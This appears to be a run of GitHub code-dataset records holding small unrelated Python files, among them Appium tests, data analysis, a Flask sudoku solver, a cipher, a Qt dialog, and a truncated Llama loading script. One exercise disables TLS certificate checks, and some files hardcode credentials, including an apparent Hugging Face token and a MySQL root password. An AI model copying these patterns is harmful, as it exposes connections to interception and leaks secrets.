self.driver.implicitly_wait(10)\n\n def teardown_class(self):\n self.driver.quit()\n\n def teardown(self):\n self.driver.find_element(MobileBy.ID,\"com.xueqiu.android:id/action_close\").click()\n @pytest.mark.parametrize('searchkey,search_result',[('alibaba','阿里巴巴'),('jd','京东')])\n def test_search(self,searchkey,search_result):\n el2 = self.driver.find_element(MobileBy.ID,\"com.xueqiu.android:id/tv_search\").click()\n el3 = self.driver.find_element(MobileBy.ID,\"com.xueqiu.android:id/search_input_text\").send_keys(searchkey)\n # 点击搜索的下拉框\n el4 = self.driver.find_element(MobileBy.XPATH,f\"//*[@text='{search_result}']\")\n el4.click()\n el5 = self.driver.find_elements(MobileBy.XPATH,f\"//*[@text='{search_result}']/../../..//*[@text='加自选']\")\n\n if len(el5)>0:\n\n el5[0].click()\n else:\n pass\n\n\n","repo_name":"abbygo/Homework","sub_path":"appium_qiyeweixin/testcases/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74308601223","text":"# %%\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom IPython.display import display\npd.set_option(\"display.max_columns\", None)\n# %%\ndf_orig = (\n pd.read_csv(\n \"../data/trajectory_data.csv\", \n )\n .assign(\n SM_DATE = lambda x: x['SM_DATE'].astype(\"datetime64\"), \n last_visit = lambda x: x.groupby(['HPCID'])['SM_DATE'].transform(max), \n follow_up = lambda x: (x['last_visit'] - x['SM_DATE']) / np.timedelta64(1, 'M')\n )\n)\n\n# %%\ndf_bapwv = df_orig.query(\"baPWV.notnull()\", engine='python').reset_index(drop=True)\n\ndisplay(df_bapwv[\"HPCID\"].value_counts().value_counts())\n# %%\ndf_abi = df_orig.query(\"ABI.notnull()\", engine='python').reset_index(drop=True)\n\ndisplay(df_abi[\"HPCID\"].value_counts().value_counts())\n\n# %%\ndf_imt = df_orig.query(\"mean_IMT.notnull()\", engine='python').reset_index(drop=True)\n\ndisplay(df_imt[\"HPCID\"].value_counts().value_counts())\n# %%\n","repo_name":"Jovinus/Trajectory_Fit","sub_path":"src/basic_analysis.py","file_name":"basic_analysis.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7045706757","text":"import json\r\nimport os\r\n\r\nfrom flask import Flask, request, render_template, Response\r\n\r\nfrom sudoku import solve as sudoku_solve, InvalidBoardException\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/solve', methods=['POST'])\r\ndef solve():\r\n board = request.values.get('board')\r\n\r\n if not board:\r\n return 'No board parameter found', 403\r\n\r\n board = json.loads(board)\r\n\r\n try:\r\n result = sudoku_solve(board)\r\n except InvalidBoardException as e:\r\n return e.message, 403\r\n\r\n return Response(\r\n response=json.dumps(result),\r\n mimetype='application/json; utf-8',\r\n )\r\n\r\nif __name__ == '__main__':\r\n PORT = os.environ.get('PORT')\r\n app.run(debug=PORT is None, host='0.0.0.0' if PORT is not None else None, port=PORT)\r\n","repo_name":"dhedegaard/sudokuweb","sub_path":"sudokuweb.py","file_name":"sudokuweb.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"22651553367","text":"# In this assignment you will write a Python program somewhat similar to\n# [http://www.py4e.com/code3/json2.py]. The program will prompt for a URL,\n# read the JSON data from that URL using urllib and then parse and extract the\n# comment counts from the JSON data, compute the sum of the numbers in the file\nimport urllib.request, urllib.parse, urllib.error\nimport json\nimport ssl\n\nserviceURL = 'http://py4e-data.dr-chuck.net/comments_1678827.json'\n\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\ndata = urllib.request.urlopen(serviceURL, context=ctx).read()\ndata = json.loads(data)\ndata = data['comments']\n\ntotal = 0\nfor result in data:\n total += int(result['count'])\n\nprint(total)\n","repo_name":"Tqkoyaki/ArchivesofBabel","sub_path":"Computer Science/Python For Everybody/Chap 13 - Python and Web Services/Exercise_JSON.py","file_name":"Exercise_JSON.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21976643218","text":"from art import logo\r\nprint(logo)\r\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',\r\n 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z','a', 'b', 'c', 'd', \r\n 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',\r\n 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n\r\nalteration= True\r\n\r\nwhile alteration:\r\n\tdirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\r\n\ttext = input(\"Type your message:\\n\").lower()\r\n\tshift = int(input(\"Type the shift number:\\n\"))%26\r\n\t\r\n\t\r\n\tdef encrypt(text, shift):\r\n\t\tshifted=\"\"\r\n\t\tfor letter in text:\r\n\t\t\tif letter in alphabet:\r\n\t\t\t\tposition= alphabet.index(letter)\r\n\t\t\t\tnew= position+ shift\r\n\t\t\t\tnew_letter= alphabet[new]\r\n\t\t\t\tshifted+=new_letter\r\n\t\t\telse:\r\n\t\t\t\tshifted+=letter\r\n\t\tprint(f\"The encoded text is {shifted}\")\r\n\t\r\n\tdef decrypt(plain, amount):\r\n\t\tnewly_shifted=\"\"\r\n\t\tfor alpha in text:\r\n\t\t\tif alpha in alphabet:\r\n\t\t\t\tnew_position= alphabet.index(alpha)\r\n\t\t\t\tnew2= new_position-shift\r\n\t\t\t\tnew_letter2= alphabet[new2]\r\n\t\t\t\tnewly_shifted +=new_letter2\r\n\t\t\telse:\r\n\t\t\t\tnewly_shifted+=alpha\r\n\t\tprint(f\"The decrypted text is {newly_shifted}\")\r\n\t\t\r\n\t\r\n\tif direction==\"encode\":\r\n\t\tencrypt(text, shift)\r\n\telif direction==\"decode\":\r\n\t\tdecrypt(plain=text, amount=shift)\r\n\t\r\n\t\r\n\t\r\n\trestart=input( \"Type 'yes' if you want to go again. Otherwise type 'no'\\n\").lower()\r\n\tif restart==\"no\":\r\n\t\talteration= False\r\n\t\tprint(\"Goodbye\")\r\n","repo_name":"Adewale-1/Python_Project","sub_path":"Encryptor.py","file_name":"Encryptor.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"8273562544","text":"import csv\nfrom pprint import pprint\n\nFILENAME = r'csv-iris.csv'\nwith open(FILENAME, encoding='utf-8') as file:\n fieldnames = [\n 'sepal_length',\n 'sepal_width',\n 'petal_length',\n 'petal_width',\n 'species'\n ]\n data = csv.DictReader(\n file,\n fieldnames=fieldnames,\n delimiter=',',\n quotechar='\"')\n\n species_dict = {\n '0': 'setosa',\n '1': 'versicolor',\n '2': 'virginica',\n }\n\n for i, row in enumerate(data):\n if i == 0:\n continue\n print(\n row['sepal_length'],\n row['sepal_width'],\n row['petal_length'],\n row['petal_width'],\n species_dict[row['species']]\n )\n","repo_name":"tzielaski/python_szkolenie","sub_path":"csv_dictreader.py","file_name":"csv_dictreader.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8458569989","text":"import unittest\n\ndef rec(f):\n\treturn [round(r.x,11) for r in f.records]\n\nclass TestAggregation(unittest.TestCase):\n\t@classmethod\n\tdef setUpClass(cls):\n\t\tfrom sqlalchemy.orm import sessionmaker, scoped_session\n\t\tfrom sqlalchemy import create_engine\n\t\tfrom databarc.schema import Aggregate_field\n\t\tfrom databarc.aggregator import Daily_aggregator, DMI_daily \n\t\t\n\t\tengine = create_engine('postgresql://arno@/DMI')\n\t\tcls.connection = engine.connect()\n\t\tcls.trans = cls.connection.begin()\n\t\tcls.S = scoped_session(sessionmaker(bind=cls.connection))\n\t\tcls.S.autoflush = False\n\t\t\n# \t\tcls.a = cls.S.query(Aggregate_field).filter_by(station_id=4360, aggregation_interval='day')\n\t\tcls.a = cls.S.query(Aggregate_field).filter(Aggregate_field.station_id==4360, Aggregate_field.name.in_(['d day','f day']))\n\t\tpp = [f.parent for f in cls.a]\n\t\tcls.b = Daily_aggregator.run_threads(pp,DMI_daily,commit=False,num_threads=2)\n\t\n\t@classmethod\n\tdef tearDownClass(cls):\n\t\tcls.S.close()\n\t\tcls.trans.rollback()\n\t\tcls.connection.close()\n\t\n\tdef test_d(self):\n\t\ta = [f for f in self.a if f.code=='d'][0]\n\t\tb = [b.field for b in self.b if b.field.code=='d'][0]\n\t\tself.assertEqual(rec(a),rec(b))\n\t\t\n# \tdef test_t(self):\n# \t\ta = [f for f in self.a if f.code=='t'][0]\n# \t\tb = [b.field for b in self.b if b.field.code=='t'][0]\n# \t\tself.assertEqual(rec(a),rec(b))\n# \t\t\n\t\n\t\t\nif __name__ == '__main__':\n unittest.main(exit=False)","repo_name":"betaplane/databarc","sub_path":"databarc/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"17138966046","text":"import pytest\n\nfrom pathlib import Path\n\nfrom scipy import ndimage\nimport numpy as np\n\nimport ncempy.algo as nalgo\nimport ncempy.io as nio\nfrom ncempy.algo import stack_align as stack_align_algo\n\n\n@pytest.fixture\ndef data_location():\n # Get the location of the test data files\n test_path = Path(__file__).resolve()\n root_path = test_path.parents[1]\n return root_path / Path('data')\n\n\ndef test_rebin():\n aa = np.ones((50, 50), dtype='<u2')\n\n # Test sum and uint16\n bb = nalgo.rebin(aa, 2, funcType='sum')\n\n assert bb[0, 0] == 4\n\n aa = np.ones((50, 50), dtype='f')\n\n # Test mean and float\n bb = nalgo.rebin(aa, 2, funcType='mean')\n\n assert bb[0, 0] == 1.0\n\ndef test_stack_align_cross(data_location):\n\n with nio.emd.fileEMD(data_location / Path('Acquisition_18.emd')) as f0:\n dd, md = f0.get_emdgroup(f0.list_emds[0])\n\n # Create a stack with known shifts\n stack0 = np.zeros((3, *dd.shape), dtype=dd.dtype)\n shifts0 = np.asarray(((range(0, -6, -2)), (range(0, 6, 2)))).T\n for ii, s in enumerate(shifts0):\n stack0[ii, :, :] = ndimage.shift(dd, s, mode='mirror')\n\n # Test static alignment (reference is first image in stack)\n out_stack, out_stack_shifts = stack_align_algo(stack0, align_type='static')\n\n for sh_static, known_shift in zip(shifts0, out_stack_shifts):\n assert sh_static[0] == -known_shift[0]\n assert sh_static[1] == -known_shift[1]\n\n # Test dynamic alignment (reference is n-1 image in stack)\n out_stack, out_stack_shifts = stack_align_algo(stack0, align_type='dynamic')\n\n for sh_dynamic, known_shift in zip(shifts0, out_stack_shifts):\n assert sh_dynamic[0] == -known_shift[0]\n assert sh_dynamic[1] == -known_shift[1]\n\n\ndef test_moments():\n \"\"\"Test on a rotated line\"\"\"\n\n ang = 35 # degree\n sh = (2, -2)\n\n # Create a a simple line\n aa = np.zeros((101, 101))\n aa[50, 1:-1] = 1\n aa = nalgo.rotateImage(aa, ang * np.pi / 180.)\n aa = nalgo.shiftImage(aa, sh)\n\n M = nalgo.moments(aa)\n mc = nalgo.moments_central(aa)\n\n c = nalgo.centroid(M) # the center\n print('centroid = {}'.format(c))\n for mm, nn in zip(sh, c):\n assert mm + 50 == round(nn)\n\n th = nalgo.moment_angle(mc) + np.pi/2. # in radians\n assert ang == round(th * 180 / np.pi)\n\n\ndef test_moments_dtype():\n \"\"\"Test that moments are calculated correctly with uint8 input dtype\"\"\"\n # Create test image\n YY, XX = np.meshgrid(np.linspace(0, 24, 25), np.linspace(0, 24, 25))\n RR = np.sqrt((XX - 24)**2 + (YY - 24)**2)\n RR = 255 * np.abs((RR / RR.max()) - 1)\n\n c1 = nalgo.centroid(nalgo.moments(RR))\n c2 = nalgo.centroid(nalgo.moments(RR.astype(np.uint8)))\n\n assert int(c1[0]) == int(c2[0])\n assert int(c1[1]) == int(c2[1])\n\n\ndef test_fourierShift():\n \"\"\"Test on a simple dataset\"\"\"\n\n im = np.eye(10, 10)\n im_sh = nalgo.shiftImage(im, (2, 0))\n assert np.round(im_sh[2, 0]) == 1\n im_sh = nalgo.shiftImage(im, (0, 2))\n assert np.round(im_sh[0, 2]) == 1\n\n\ndef test_fourierRotate():\n \"\"\"Test that it works\"\"\"\n im = np.eye(10, 10)\n\n theta = 3 * np.pi / 180.\n im_rot = nalgo.rotateImage(im, theta)\n\n im_rot = nalgo.rotateImage(im, theta, pad=True)\n assert im_rot.shape[0] == 12\n\n\ndef test_fourierShear():\n \"\"\"Test that it works\"\"\"\n im = np.eye(10, 10)\n\n im_shear = nalgo.shearImage(im, 0, 0.5)\n","repo_name":"ercius/openNCEM","sub_path":"ncempy/test/test_algo.py","file_name":"test_algo.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"81"} +{"seq_id":"72648068745","text":"from ..common.config import DataConfig\nfrom collections import defaultdict\nfrom pprint import pprint\n\nimport os\n\n\ndef analyze_class_counts():\n train_counter = defaultdict(int)\n test_counter = defaultdict(int)\n\n def count_under_path(path, counter):\n folders = os.listdir(path)\n for folder in folders:\n counter[folder] += len(os.listdir(os.path.join(path, folder)))\n return counter\n\n return count_under_path(DataConfig.PATHS['TRAINING_PROCESSED_DATA'], train_counter), count_under_path(\n DataConfig.PATHS['VALID_PROCESSED_DATA'], test_counter)\n\n\ndef main():\n train, test = analyze_class_counts()\n pprint(train)\n pprint(test)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kacperkan/gesture-classifier-training-framework","sub_path":"api/src/data_processing/data_analyze.py","file_name":"data_analyze.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5551933529","text":"#!/usr/bin/env python\n\"\"\"Tests for `agrometeo` package.\"\"\"\n# pylint: disable=redefined-outer-name\nimport numpy as np\n\nimport agrometeo as agm\n\n\ndef test_agrometeo():\n # test core functions\n agm_ds = agm.AgrometeoDataset(region=\"Pully, Switzerland\")\n assert agm_ds.CRS is not None\n num_stations = len(agm_ds.stations_gdf)\n assert num_stations >= 1\n start_date = \"2022-03-22\"\n end_date = \"2022-03-23\"\n # test that variable can be an ECV following the meteostations-geopy nomenclature, a\n # variable name following the agrometeo nomenclature and a variable code (as str or\n # int) following the agrometeo nomenclature\n for variable in [\"temperature\", \"Precipitation\", \"1\", 1]:\n ts_df = agm_ds.get_ts_df(\n variable=variable, start_date=start_date, end_date=end_date\n )\n assert len(ts_df.columns) == num_stations\n ts_gdf = agm_ds.get_ts_gdf(\n variable=variable, start_date=start_date, end_date=end_date\n )\n assert len(ts_gdf) == num_stations\n assert ts_gdf[\"geometry\"].isna().sum() == 0\n\n # test plotting\n # use `add_basemap=False` to avoid having to mock contextily's requests\n ax = agm.plot_temperature_map(ts_gdf, add_basemap=False)\n assert len(ax.get_title()) > 0\n ax = agm.plot_temperature_map(ts_gdf, title=False, add_basemap=False)\n assert len(ax.get_title()) == 0\n ax = agm.plot_temperature_map(ts_gdf, title=\"some-title\", add_basemap=False)\n assert len(ax.get_title()) > 0\n assert len(ax.collections[0].get_array()) == num_stations\n ts_columns = ts_gdf.columns.drop(\"geometry\")\n axes = [\n agm.plot_temperature_map(\n ts_gdf,\n dt=dt,\n add_basemap=False,\n )\n for dt in [ts_columns[0], ts_columns[-1]]\n ]\n assert not np.array_equal(\n axes[0].collections[0].get_array(), axes[1].collections[0].get_array()\n )\n # test other args\n agm.plot_temperature_map(ts_gdf, add_basemap=False, plot_kws={\"cmap\": \"Spectral\"})\n agm.plot_temperature_map(ts_gdf, add_basemap=False, append_axes_kws={\"pad\": 0.4})\n","repo_name":"martibosch/agrometeo-geopy","sub_path":"tests/test_agrometeo.py","file_name":"test_agrometeo.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"20707568379","text":"# Implementar la funcion listar_pesos, que devuelva el historial de pesos para una persona dada.\n# Debe validar:\n# - que el ID de la persona ingresada existe (reutilizando las funciones ya implementadas).\n# Debe devolver:\n# - Lista de (fecha, peso), donde fecha esta representado por el siguiente formato: AAAA-MM-DD.\n# Ejemplo:\n# [\n# ('2018-01-01', 80),\n# ('2018-02-01', 85),\n# ('2018-03-01', 87),\n# ('2018-04-01', 84),\n# ('2018-05-01', 82),\n# ]\n# - False en caso de no cumplir con alguna validacion.\n\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom ejercicio_04 import buscar_persona\nfrom ejercicio_06 import PersonaPeso\n\n\nBase = declarative_base()\n\n\nengine = create_engine('mysql://root:datos@localhost:3306/soporte_practica_03')\nBase.metadata.bind = engine\nDBSession = sessionmaker()\nDBSession.bind = engine\nsession = DBSession()\n\n\ndef listar_pesos(idPersona):\n per = buscar_persona(idPersona)\n listaper = []\n if per == False:\n return False\n else:\n pesos = session.query(PersonaPeso).filter_by(idPersona=idPersona).all()\n for p in pesos:\n pp = (p.fecha.strftime(\"%Y-%m-%d\"), p.peso)\n listaper.append(pp)\n return listaper\n\n\n","repo_name":"alesandroninazarena/frro-soporte-2019-06","sub_path":"Practico-03(a)/ejercicio_08.py","file_name":"ejercicio_08.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37713040908","text":"# 长度最小的连续子数组\n# 注意并不是要求里面数字是连续的\n\nfrom typing import List\n\n\nclass Solution:\n # def minSubArrayLen(self, s: int, nums: List[int]) -> int:\n # if not nums:\n # return 0\n #\n # n = len(nums)\n # ans = n + 1\n # start, end = 0, 0\n # total = 0\n # while end < n:\n # total += nums[end]\n # while total >= s:\n # ans = min(end - start + 1, ans)\n # total -= nums[start]\n # start += 1\n # end += 1\n #\n # return 0 if ans == n + 1 else ans\n\n # 暴力法,超时\n # def minSubArrayLen(self, s: int, nums: List[int]) -> int:\n # if not nums:\n # return 0\n #\n # n = len(nums)\n # res = n + 1\n # for i in range(n):\n # total = 0\n # for j in range(i, n): # 能用 for 循环尽量用 for 循环\n # total += nums[j]\n # if total >= s:\n # res = min(res, j - i + 1)\n # break\n # return 0 if res == n + 1 else res\n def minSubArrayLen(self, s: int, nums: List[int]) -> int:\n if not nums:\n return 0\n\n n = len(nums)\n res = n + 1\n i, j = 0, 0\n total = 0\n while j < n:\n total += nums[j]\n while total >= s:\n res = min(res, j - i + 1)\n total -= nums[i]\n i += 1\n j += 1\n return 0 if res == n + 1 else res\n\n\n\nobj = Solution()\ns = 7\nnums = [2,3,1,2,4,3]\nprint(obj.minSubArrayLen(s, nums))\n\ns = 100\nnums = []\nprint(obj.minSubArrayLen(s, nums))\n\ns = 11\nnums = [1,2,3,4,5]\nprint(obj.minSubArrayLen(s, nums))\n\ns = 3\nnums = []\nprint(obj.minSubArrayLen(s, nums))\n","repo_name":"BruceHi/leetcode","sub_path":"month6/minSubArrayLen.py","file_name":"minSubArrayLen.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"6731191780","text":"#from qgis.gui import *\n#from qgis.core import *\n#from qgis.PyQt import QtCore, QtGui, QtWidgets\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport time\n\nlistUTC = [-12, -11, -10, -9.5, -9, -8, -7, \n -6, -5, -4, -3.5, -3, -2, -1, 0,\n 1, 2, 3, 3.5, 4, 4.5, 5, 5.5, 5.75, \n 6, 6.5, 7, 8, 8.75, 9, 9.5, 10, 10.5,\n 11, 12, 12.75, 13, 14]\n\nclass Ui_gpxWindow(object):\n def setupUi(self, gpxWindow):\n gpxWindow.setObjectName(\"gpxWindow\")\n gpxWindow.resize(399, 363)\n self.buttonBox = QtWidgets.QDialogButtonBox(gpxWindow)\n self.buttonBox.setGeometry(QtCore.QRect(210, 240, 161, 32))\n self.buttonBox.setOrientation(QtCore.Qt.Horizontal)\n self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)\n self.buttonBox.setObjectName(\"buttonBox\")\n self.label = QtWidgets.QLabel(gpxWindow)\n self.label.setGeometry(QtCore.QRect(30, 100, 171, 16))\n self.label.setObjectName(\"label\")\n self.groupBox = dropedit(gpxWindow)\n self.groupBox.setGeometry(QtCore.QRect(20, 10, 351, 71))\n self.groupBox.setObjectName(\"groupBox\")\n self.toolButtonGPX = QtWidgets.QToolButton(self.groupBox)\n self.toolButtonGPX.setGeometry(QtCore.QRect(320, 30, 25, 19))\n self.toolButtonGPX.setObjectName(\"toolButtonGPX\")\n self.lineEditPathGPX = QtWidgets.QLineEdit(self.groupBox)\n self.lineEditPathGPX.setGeometry(QtCore.QRect(20, 30, 291, 20))\n self.lineEditPathGPX.setObjectName(\"lineEditPathGPX\")\n self.label_2 = QtWidgets.QLabel(gpxWindow)\n self.label_2.setGeometry(QtCore.QRect(30, 140, 161, 16))\n self.label_2.setObjectName(\"label_2\")\n self.checkBoxKeep = QtWidgets.QCheckBox(gpxWindow)\n self.checkBoxKeep.setGeometry(QtCore.QRect(30, 215, 221, 17))\n self.checkBoxKeep.setObjectName(\"checkBoxKeep\")\n self.progressBar = QtWidgets.QProgressBar(gpxWindow)\n self.progressBar.setEnabled(True)\n self.progressBar.setGeometry(QtCore.QRect(40, 310, 331, 23))\n self.progressBar.setProperty(\"value\", 0)\n self.progressBar.setObjectName(\"progressBar\")\n self.spinBoxInterpol = QtWidgets.QSpinBox(gpxWindow)\n self.spinBoxInterpol.setGeometry(QtCore.QRect(200, 100, 171, 22))\n self.spinBoxInterpol.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.spinBoxInterpol.setMinimum(0)\n self.spinBoxInterpol.setMaximum(3600)\n self.spinBoxInterpol.setSingleStep(5)\n self.spinBoxInterpol.setProperty(\"value\", 120)\n self.spinBoxInterpol.setObjectName(\"spinBoxInterpol\")\n self.toolButtonUpUTC = QtWidgets.QToolButton(gpxWindow)\n self.toolButtonUpUTC.setGeometry(QtCore.QRect(355, 139, 16, 12))\n self.toolButtonUpUTC.setArrowType(QtCore.Qt.UpArrow)\n self.toolButtonUpUTC.setObjectName(\"toolButtonUpUTC\")\n self.toolButtonUpUTC.clicked.connect(self.upArrowPress)\n self.toolButtonDownUTC = QtWidgets.QToolButton(gpxWindow)\n self.toolButtonDownUTC.setGeometry(QtCore.QRect(355, 149, 16, 12))\n self.toolButtonDownUTC.setArrowType(QtCore.Qt.DownArrow)\n self.toolButtonDownUTC.setObjectName(\"toolButtonDownUTC\")\n self.toolButtonDownUTC.clicked.connect(self.downArrowPress)\n self.lineEditUTC = QtWidgets.QLineEdit(gpxWindow)\n self.lineEditUTC.setGeometry(QtCore.QRect(200, 140, 156, 20))\n self.lineEditUTC.setObjectName(\"lineEditUTC\")\n self.lineEditUTC.setReadOnly(True)\n offset = time.timezone if (time.localtime().tm_isdst == 0) else time.altzone\n self.currentUTC = offset /60 /60 * -1\n for i in range(len(listUTC)) :\n if listUTC[i] == self.currentUTC :\n self.currentIndex = i\n break\n else : \n self.currentIndex = 14\n self.setUTCstr(self.currentUTC)\n self.label_3 = QtWidgets.QLabel(gpxWindow)\n self.label_3.setGeometry(QtCore.QRect(30, 180, 131, 16))\n self.label_3.setObjectName(\"label_3\")\n self.spinBoxDecalage = QtWidgets.QSpinBox(gpxWindow)\n self.spinBoxDecalage.setGeometry(QtCore.QRect(200, 180, 171, 22))\n self.spinBoxDecalage.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.spinBoxDecalage.setMinimum(0)\n self.spinBoxDecalage.setMaximum(3600)\n self.spinBoxDecalage.setSingleStep(5)\n self.spinBoxDecalage.setProperty(\"value\", 0)\n self.spinBoxDecalage.setObjectName(\"spinBoxDecalage\")\n self.labelNbSelect = QtWidgets.QLabel(gpxWindow)\n self.labelNbSelect.setGeometry(QtCore.QRect(40, 280, 331, 20))\n self.labelNbSelect.setObjectName(\"labelNbSelect\")\n\n self.retranslateUi(gpxWindow)\n QtCore.QMetaObject.connectSlotsByName(gpxWindow)\n\n def retranslateUi(self, gpxWindow):\n _translate = QtCore.QCoreApplication.translate\n gpxWindow.setWindowTitle(_translate(\"gpxWindow\", \"Ajout par GPX\"))\n self.label.setText(_translate(\"gpxWindow\", \"Temps d\\'interpolation maximal (s)\"))\n self.groupBox.setTitle(_translate(\"gpxWindow\", \"Chemin GPX\"))\n self.toolButtonGPX.setText(_translate(\"gpxWindow\", \"...\"))\n self.label_2.setText(_translate(\"gpxWindow\", \"Décalage Horaire ±HH:MM (UTC)\"))\n self.checkBoxKeep.setText(_translate(\"gpxWindow\", \"Conserver les coordonnées existantes\"))\n self.toolButtonUpUTC.setText(_translate(\"gpxWindow\", \"...\"))\n self.toolButtonDownUTC.setText(_translate(\"gpxWindow\", \"...\"))\n self.label_3.setText(_translate(\"gpxWindow\", \"Décalage temporel additionnel (s)\"))\n self.labelNbSelect.setText(_translate(\"gpxWindow\", \" Le traitement s\\'appliquera sur les 0 photos sélectionnées.\"))\n\n def upArrowPress(self) :\n if self.currentIndex < 37 :\n self.currentIndex += 1\n self.currentUTC = listUTC[self.currentIndex]\n self.setUTCstr(self.currentUTC)\n else :\n pass\n\n\n def downArrowPress(self) :\n if self.currentIndex > 0 :\n self.currentIndex -= 1\n self.currentUTC = listUTC[self.currentIndex]\n self.setUTCstr(self.currentUTC)\n else :\n pass\n\n def setUTCstr(self, utc) :\n strSign = '+' if utc >= 0 else '-'\n strHour = str(int(abs(utc))) if int(abs(utc)) > 9 else '0' + str(int(abs(utc)))\n \n if abs(utc - int(utc)) == 0.25 :\n strMin = '15'\n elif abs(utc - int(utc)) == 0.5 :\n strMin = '30'\n elif abs(utc - int(utc)) == 0.75 :\n strMin = '45'\n else :\n strMin = '00'\n \n strUTC = strSign + strHour + ':' + strMin\n \n self.lineEditUTC.setText(strUTC)\n\n\n\nclass dropedit(QtWidgets.QGroupBox): \n\n def __init__(self, parent=None):\n super(dropedit, self).__init__(parent)\n self.setAcceptDrops(True)\n\n def dragEnterEvent(self, event):\n event.accept()\n \n def dropEvent(self, event):\n fileURL = event.mimeData().urls()[0].toString()\n try :\n fileName = fileURL.split('file:///')[1]\n except :\n fileName = fileURL.split('file:')[1]\n \n for child in self.children(): \n if child.metaObject().className() == \"QLineEdit\":\n child.setText(fileName)\n","repo_name":"frpin33/geoRef_QGIS","sub_path":"ui_importGPXWindow.py","file_name":"ui_importGPXWindow.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27719752692","text":"import numpy as np\ncount = np.array([[1,1],[1,0]])\ndef fibonacci(n):\n global count\n if not isinstance(n, int):\n print ('Invalid Input')\n return None\n if n < 0:\n print ('Invalid Input')\n return None\n A = np.array([[1,1],[1,0]])\n for a in range(1,n):\n \t\tcount = np.dot(count,A)\n \t\nfibonacci(5)\nprint (count[0][0])","repo_name":"howard31622/fibonacci-algorithm","sub_path":"fib5.py","file_name":"fib5.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41356777807","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nGiven a non-negative index k where k ≤ 33, return the kth index row of the Pascal's triangle.\n\nNote that the row index starts from 0.\nExample:\n\nInput: 3\nOutput: [1,3,3,1]\nFollow up:\nCould you optimize your algorithm to use only O(k) extra space?\n构造杨辉三角\n\"\"\"\n\n\nclass Solution:\n def genRow(self, numRows):\n \"\"\"\n :type numRows: int\n :rtype: List[List[int]]\n \"\"\"\n result = []\n\n for i in range(1, numRows + 2):\n if i <= 2:\n result = [1 for i in range(i)]\n continue\n current_line = []\n for j in range(i):\n if j == 0 or j == (i - 1):\n current_line.append(1)\n else:\n tmp = result[j] + result[j - 1]\n current_line.append(tmp)\n result = current_line\n return result\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.getRow(1))\n","repo_name":"misslibra/algorithms","sub_path":"python/pascals-triangle-II.py","file_name":"pascals-triangle-II.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"72960176265","text":"from torch import cuda, bfloat16\nimport transformers\n\nmodel_id = 'meta-llama/Llama-2-7b-chat-hf'\n\ndevice = 'cpu'\n\n# set quantization configuration to load large model with less GPU memory\n# this requires the `bitsandbytes` library\nbnb_config = transformers.BitsAndBytesConfig(\n load_in_4bit=True,\n bnb_4bit_quant_type='nf4',\n bnb_4bit_use_double_quant=True,\n bnb_4bit_compute_dtype=bfloat16,\n load_in_4bit_cpu_offload=True, # Load 4-bit model on CPU\n load_in_8bit_fp32_cpu_offload=True # Try adding this\n)\n\n\n# begin initializing HF items, need auth token for these\nhf_auth = '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'\nmodel_config = transformers.AutoConfig.from_pretrained(\n model_id,\n 